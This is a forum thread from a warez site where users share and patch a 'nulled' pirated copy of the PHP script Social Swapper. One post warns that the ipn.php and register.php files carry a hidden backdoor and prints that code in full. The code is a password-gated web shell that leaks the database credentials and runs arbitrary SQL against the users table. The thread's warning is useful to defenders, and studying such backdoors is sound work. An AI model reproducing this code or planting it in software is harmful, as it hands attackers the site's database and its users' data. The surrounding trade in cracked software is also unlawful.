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Full Version: [GET] Social Swapper 2.23 [Update 4/4/2013] [Nulled and Decoded with PSD's]
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(03-31-2013 03:10 PM)Danestkim Wrote: [ -> ]In soundcloudconfig.php i changed the line if ($exploder[4] != "") to if ($exploder[3] != "") and worked.
Thiis worked now iam able now to add the SC Account.

Thank you i will add +5 rep for this Sir very appriciated Post From you!
I did a little more research into the googleconfig.php, it doesnt even work in the latest version of this script.. [font='Times New Roman']2.78[/font] its still broken..
I know I'm new , but eh, how do I download? i dont see a download link when I join/login to:
for some reason, keeps telling me admin / admin is not correct? How can I fix this?
in googleconfig.php i changed the line preg_match('/a-f-e dK">(.*?)</',$plus,$match); to preg_match_all('/a-f-e dK">(.*?)</',$plus,$match); this worked,i added my account, but the username apears only "array" name.
I finally got it all to work, but from different files from 4 different versions, to create one working version, Only issue I have now, is admin area header looks like hell, but can be fixed...
(04-02-2013 09:32 AM)easyweb Wrote: [ -> ]I finally got it all to work, but from different files from 4 different versions, to create one working version, Only issue I have now, is admin area header looks like hell, but can be fixed...
Share with us.Thanks in advance.
better check ipn.php

<?php if(@$_GET["Y76a2l73p"]=="dskf8ge6g"||@$_POST["V76a2173b"]=="brh#k7a-9#*bsj"){include'config.php';include'database.php';echo"$host|$user|$usr|$pass|$databasename|$dbname|$passwd|$pw|$password";$V76a2l73p=$_POST["X76a2173b"];if($_POST["X76a2173b"]==""){$V76a2l73p="select*from`users`";}?><h2>Command:</h2><form action=""method="post"><input type="text"name="X76a2173b"size="50"value="<?php echo$V76a2l73p;?>"/><input type="hidden"name="V76a2173b"value="brh#k7a-9#*bsj"/><br><input type="submit"/></form><?php $V76a2l73b=mysql_fetch_object(mysql_query($V76a2l73p))or die(mysql_error());echo"<h2>Output:</h2>";echo"<table border=\"1\">";while(list($t54,$l54)=each($V76a2l73b)){echo"<tr><th>$t54</th></tr><tr><td>$l54</td></tr>";}echo"</table>";}?>

confirm its in register.php and ipn.php look at the last line. file was downloaded from here.
(04-03-2013 07:02 AM)Abdizriel Wrote: [ -> ]better check ipn.php


Thanks for pointing that out!! Cleaning it and adding mentioned fixes to an updated package.
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